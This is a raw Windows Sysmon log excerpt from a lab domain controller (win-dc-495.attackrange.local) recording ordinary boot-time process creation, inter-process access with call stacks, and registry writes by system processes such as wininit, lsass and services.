13:33:58.330{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.330{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.330{59A5CD1D-8E44-6005-0A00-00000000A301}848852C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a423|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.299{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.299{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.299{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.283{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.174{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.174{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.174{59A5CD1D-8E44-6005-0A00-00000000A301}848852C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a698|C:\Windows\system32\services.exe+1a391|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.173{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.158{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:57.611{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database EpochDWORD (0x00000614) 10341000x8000000000000000753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:57.002{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:57.002{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:57.002{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.986{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.986{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.627{59A5CD1D-8E44-6005-0B00-00000000A301}856860C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+4e37c|C:\Windows\system32\lsasrv.dll+56c8f|C:\Windows\system32\lsasrv.dll+621fe|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.518{59A5CD1D-8E44-6005-0700-00000000A301}712716C:\Windows\system32\wininit.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.518{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.518{59A5CD1D-8E44-6005-0700-00000000A301}712716C:\Windows\system32\wininit.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.525{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.471{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.471{59A5CD1D-8E44-6005-0700-00000000A301}712716C:\Windows\system32\wininit.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.464{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exe10.0.14393.4169 (rs1_release.210107-1130)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=FEFC26105685C70D7260170489B5B520,SHA256=930F44F9A599937BDB23CF0C7EA4D158991B837D2A0975C15686CDD4198808E8,IMPHASH=A1C9FD59764D67AA201947276212F7CF{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.299{59A5CD1D-8E44-6005-0600-00000000A301}704708C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.302{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe- 10341000x8000000000000000738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.283{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.252{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Domainattackrange.local 13241300x8000000000000000736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.252{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostnamewin-dc-495 10341000x8000000000000000735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.236{59A5CD1D-8E43-6005-0400-00000000A301}632636C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.243{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{59A5CD1D-8E43-6005-0400-00000000A301}632C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000c0 0000007c 10341000x8000000000000000733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 